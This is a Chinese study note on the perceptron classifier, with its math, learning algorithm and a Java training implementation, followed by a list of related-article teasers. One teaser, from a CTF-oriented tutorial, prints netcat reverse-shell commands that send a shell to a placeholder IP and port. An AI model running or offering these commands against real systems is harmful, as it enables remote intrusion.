【学习笔记-机器学习】感知机模型

Author:赵志乾
Date:2024-06-26
Declaration:All Right Reserved!!!

1. 基本概念

        数据集的线性可分性:给定一个数据集

T= \left \{(x_{1},y_{1}),(x_{2},y_{2}),\cdots ,(x_{N},y_{N}) \right \}

       其中,x_{i}\in X=R^{n}y_{i}\in Y =\left \{ +1,-1 \right \}i=1,2,\cdots ,N,如果存在某个超平面S

w \cdot x + b = 0

       能够将数据集的正实例点和负实例点完全正确地划分到超平面的两侧,即对所有y_{i}=+1的实例i,有w\cdot x_{i}+b>0,对所有y_{i}=-1的实例i,有w\cdot x_{i}+b < 0,则称数据集T是线性可分的,否则,称数据集T线性不可分;

        感知机:假设输入空间(特征空间)是X\subseteq R^n,输出空间是Y=\left \{ +1,-1 \right \}。输入x\in X表示实例的特征向量,对应于输入空间的点;输出y\in Y表示实例的类别。由输入空间到输出空间的如下函数:

f(x)=sign(w \cdot x +b)

       称为感知机。其中w和b为感知机的模型参数,w\in R^n叫作权向量,b \in R叫做偏置,w \cdot x表示w和x的内积。sign是符号函数,即

sign(x)=\begin{cases} & \text{+1 , } x\geqslant 0\\ & \text{ -1, } x<0 \end{cases}

2. 学习策略

2.1 前提假设

        训练数据集是线性可分的。

2.2 学习目标

       求得一个能够将训练数据集的正实例点和负实例点完全正确分开的分离超平面,即确定感知机模型参数w、b;

2.3 学习策略

      将误分类点到超平面S的总距离作为损失函数并将损失函数极小化。最小化损失函数采用随机梯度下降法。

3. 学习算法  

3.1 算法描述 

        输入:训练数据集T= \left \{(x_{1},y_{1}),(x_{2},y_{2}),\cdots ,(x_{N},y_{N}) \right \}, 其中,x_{i}\in X=R^{n}y_{i}\in Y =\left \{ +1,-1 \right \}i=1,2,\cdots ,N;学习率\eta (0<\eta\leqslant 1)

         输出:w,b;感知机模型为f(x)=sign(w \cdot x +b)

        (1) 选取初值w_{0}, b_{0}

        (2) 在训练集中选取数据(x_{i},y_{i})

        (3) 如果y_{i}(w\cdot x_{i}+b)\leqslant 0

w\leftarrow w+\eta y_{i}x_{i}

b\leftarrow b+\eta y_{i}

        (4) 转至(2),直至训练集中没有误分类点。

 3.2 算法实现
// step0: 输入数据构造
List<List<Double>> points = new ArrayList<>();
List<Integer> ys = new ArrayList<>();
List<Double> point = new ArrayList<>();
point.add(3d);
point.add(3d);
points.add(point);
ys.add(1);point = new ArrayList<>();
point.add(4d);
point.add(3d);
points.add(point);
ys.add(1);point = new ArrayList<>();
point.add(1d);
point.add(1d);
points.add(point);
ys.add(-1);// 学习率
double eta=1;//**************************学习过程*******************************
// step1: 初始化w和b
List<Double> w = new ArrayList<>();
Double b = 0d;
for (int index = 0; index < points.get(0).size(); index++) {w.add(0d);
}// step2: 迭代学习
Random random = new Random();
// step2.1: 获取误分类点的下标
List<Integer> misclassifiedPointIndexes = getMisclassifiedPointIndexes(w,b,points,ys);
while(misclassifiedPointIndexes.size()>0){int index = misclassifiedPointIndexes.get(random.nextInt(misclassifiedPointIndexes.size()));// 更新w和bfor(int i = 0; i< w.size(); i++){w.set(i,w.get(i)+eta*ys.get(index)*points.get(index).get(i));}b = b+ eta*ys.get(index);misclassifiedPointIndexes = getMisclassifiedPointIndexes(w,b,points,ys);
}// step3: 输出结果
StringBuilder resultStr = new StringBuilder(" w=[");
for(Double weight : w){resultStr.append(weight).append(",");
}
resultStr.setCharAt(resultStr.length()-1,']');
System.out.println("结果:w="+resultStr+" b="+b);//*****************************函数封装***************************************
// 获取误分类点下表
public static List<Integer> getMisclassifiedPointIndexes(List<Double> w,Double b,List<List<Double>> points,List<Integer> ys){List<Integer> result = new ArrayList<>();for(int index=0; index<points.size();index++){if(isMisclassifiedPoint(w,b,points.get(index),ys.get(index))){result.add(index);}}return result;
}// 判定是否为误分类点
public static boolean isMisclassifiedPoint(List<Double> w,Double b, List<Double> point, Integer y){double error = 0;for(int index=0; index< point.size(); index++){error += w.get(index)*point.get(index);}error += b;error *= y;return error<=0;
}

4. 应用场景

        感知机是一种二分类的线性分类模型,属于判别模型,是神经网络和支持向量机的基础;其应用分两个过程:

  • 学习过程:求出将训练数据集进行线性划分的分离超平面,即确定模型参数w和b;
  • 预测过程:用学习到的模型对新的输入实例进行分类;

     注意事项:感知机模型使用的前提条件是训练数据集是线性可分的,否则感知机学习算法不收敛,学习过程发生震荡;

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/861326.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Python的100道练习题目,每日一练,必成大神!!!

整理了100道Python的题目&#xff0c;如果你是一位初学者&#xff0c;这一百多道题可以 帮助你轻松的使用Python。初学 者每天可以尝试3-5个问题&#xff0c;经过这一百道题的练习&#xff0c;要把练习昨晚并且完全懂了&#xff0c;基本上Python就已 经入门了。如果你不是初学者…

Day 34:2368. 受限条件下可到达节点的数目

Leetcode 2368. 受限条件下可到达节点的数目 现有一棵由 n 个节点组成的无向树&#xff0c;节点编号从 0 到 n - 1 &#xff0c;共有 n - 1 条边。 给你一个二维整数数组 edges &#xff0c;长度为 n - 1 &#xff0c;其中 edges[i] [ai, bi] 表示树中节点 ai 和 bi 之间存在一…

OpenCV 车道检测

OpenCV 车道检测 前言模型分析车道检测相关链接 前言 如果要检测道路图像中的车道&#xff0c;方法之一是利用深度学习的语义分割技术。而在 OpenCV 中解决此问题可以使用边缘检测器。在本节中&#xff0c;我们将了解如何使用边缘检测和直线检测识别道路图像中的车道。 模型分…

测试用例的基本要素与设计方法

测试用例的基本要素 测试用例&#xff08;Test Case&#xff09;是为了实施测试而向被测试的系统提供的一组集合&#xff0c;这组集合包含&#xff1a;测试环境、操作步骤、测试数据、预期结果等要素。 好的测试用例是一个不熟悉业务的人也能依据用例来很快的进行测试评价测试用…

RT-Thread使用HAL库实现双线程控制LED交替闪烁

如何创建工程我的其他文中你面有可以进去查看 1创建线程&#xff08;以动态方式实现&#xff09; 1-2创建函数入口 1-2启动函数 main.c文件源码 /** Copyright (c) 2006-2024, RT-Thread Development Team** SPDX-License-Identifier: Apache-2.0** Change Logs:* Date …

【课程总结】Day11(下):YOLO的入门使用

前言 YOLO的简介 YOLO&#xff08;You Only Look Once&#xff09;是一种流行的目标检测算法&#xff0c;由Joseph Redmon等人于2015年提出。YOLO的设计思想是将目标检测任务转化为单个神经网络的回归问题&#xff0c;通过在图像上划分网格并对每个网格预测边界框和类别置信度…

40.连接假死-空闲检测-发送心跳

连接假死情况 1.网络设备出现故障,例如网卡,机房等。底层的TCP连接已经断开,但应用程序没有感知到,仍然占着资源。 2.公网网络不稳定,出现丢包。若果连续出现丢包,这时现象就是客户端数据发不出去,服务端也一直收不到数据,就这么一直耗着。 3.应用程序线程阻塞,无法…

Java初识集合(后续不断补充)

第一次更新时间&#xff1a;2024.6.26 集合概述 Java中的集合就像一个容器&#xff0c;专门用来存储Java对象&#xff08;实际上是对象的引用&#xff0c;但习惯称为对象&#xff09;&#xff0c;这些对象可以是任意的数据类型&#xff0c;并且长度可变。其中&#xff0c;这些…

反弹shell 纯干货版 --D--K--盾

本文主要讲解我已知的CTF中对VPS的利用的教程模块&#xff0c;所以本篇文章将会持续更新并且有改动 解密base64会解锁新大陆&#xff1a; REvnm77lrpjmlrnnvqTvvJo3MjcwNzcwNTU弹shell 弹shell有很多种类 NC nc ip port -e /bin/sh nc -e /bin/sh ip port //这种版…

一文了解自定义表单系统开源的多个优势

降本、提质、增效&#xff0c;是当前很多企业都想实现的目的。什么样的软件可以助力企业创造价值&#xff1f;低代码技术平台是近些年得到了很多客户喜爱的平台产品&#xff0c;因为它能帮助大家减少编程代码的撰写&#xff0c;能轻松助力各部门之间做好协调沟通工作&#xff0…

springcould-config git源情况下报错app仓库找不到

在使用spring config server服务的时候发现在启动之后的一段时间内控制台会抛出异常&#xff0c;spring admin监控爆红&#xff0c;控制台信息如下 --2024-06-26 20:38:59.615 - WARN 2944 --- [oundedElastic-7] o.s.c.c.s.e.JGitEnvironmentRepository : Error occured …

番外篇 | YOLOv8改进之利用轻量化卷积PConv引入全新的结构CSPPC来替换Neck网络中的C2f | 模型轻量化

前言:Hello大家好,我是小哥谈。本文使用轻量化卷积PConv替换Neck中C2f模块中Bottleneck里的传统卷积核得到CSPPC模块,使得模型更加轻量化。🌈 目录 🚀1.基础概念 🚀2.网络结构 🚀3.添加步骤 🚀4.改进方法 🍀🍀步骤1:block.py文件修改 🍀🍀步…

MySQL 8 命令安装卸载教程

一、下载MySQL8 下载连接 MySQL :: Download MySQL Community Server 我下载的是当前最新版8.4 二、安装 1.解压 解压到需要安装的位置&#xff0c;例如我的位置&#xff1a; 2.创建配置文件 新建文本文档&#xff0c;复制下面配置文件&#xff08;注意修改路经&#xff09;…

Modbus TCP什么场景用?

什么是Modbus TCP Modbus TCP是一种基于TCP/IP网络的通信协议&#xff0c;它允许不同的设备通过以太网进行数据交换。Modbus协议最初是为串行通信设计的&#xff0c;但随着网络技术的发展&#xff0c;Modbus TCP应运而生&#xff0c;它继承了Modbus RTU和Modbus ASCII的许多优点…

平凉小果子,平凡中的惊艳味道

平凉美食小果子&#xff0c;这看似平凡的名字背后&#xff0c;藏着无数平凉人的美好回忆。它不仅仅是一种食物&#xff0c;更是一种情感的寄托&#xff0c;一种文化的传承。小果子的制作过程看似简单&#xff0c;实则蕴含着深厚的功夫。选用优质的面粉作为主要原料&#xff0c;…

Java学习笔记(多线程):CompetableFuture

本文是自己的学习笔记&#xff0c;主要参考资料如下 https://www.cnblogs.com/dolphin0520/p/3920407.html JavaSE文档 https://blog.csdn.net/ThinkWon/article/details/102508721 1、Overview2、重要参数3、主要方法3.1、创建实例&#xff0c;获取返回值3.2、线程执行顺序相关…

大自然高清风景视频无水印素材在哪下载?下载视频素材网分享

在视频创作领域&#xff0c;一段高清的风景视频可以极大地提升你的作品质感。无论是作为背景、过渡片段还是主要内容&#xff0c;优质的风景视频素材都是必不可少的。然而&#xff0c;寻找既高清又无水印的风景视频素材并非易事。为了帮助大家轻松获取这类素材&#xff0c;我整…

牛客周赛 Round 48 解题报告 | 珂学家

前言 题解 这场感觉有点难&#xff0c;D完全没思路, EF很典&#xff0c;能够学到知识. E我的思路是容斥贡献&#xff0c;F很典&#xff0c;上周考过一次&#xff0c;引入虚拟节点质数(有点像种类并查集类似的技巧). 欢迎关注 珂朵莉 牛客周赛专栏 珂朵莉 牛客小白月赛专栏 …

Marin说PCB之total etch length规则知多少?

魔都上海最近迎来了一轮梅雨季节了&#xff0c;小编我上周就已经提前把被子衣服袜子都晒了一遍&#xff0c;省的后面一段时间下雨就不能晒了。这种阴雨绵绵的天气当然在家里睡觉最舒服了&#xff0c;上周留正当我在家里夏眠的时候&#xff0c;突然被一阵手机铃声吵醒了&#xf…

代码签名证书:保护你的软件,就像保护你的宝贝

Hey&#xff0c;大家好&#xff01;今天我们来聊聊一个听起来可能有点技术宅&#xff0c;但实际上超级重要的东西——代码签名证书。别担心&#xff0c;我会用最简单易懂的话来解释它&#xff0c;保证你看完这篇文章后&#xff0c;能对代码签名证书有个全新的认识&#xff01; …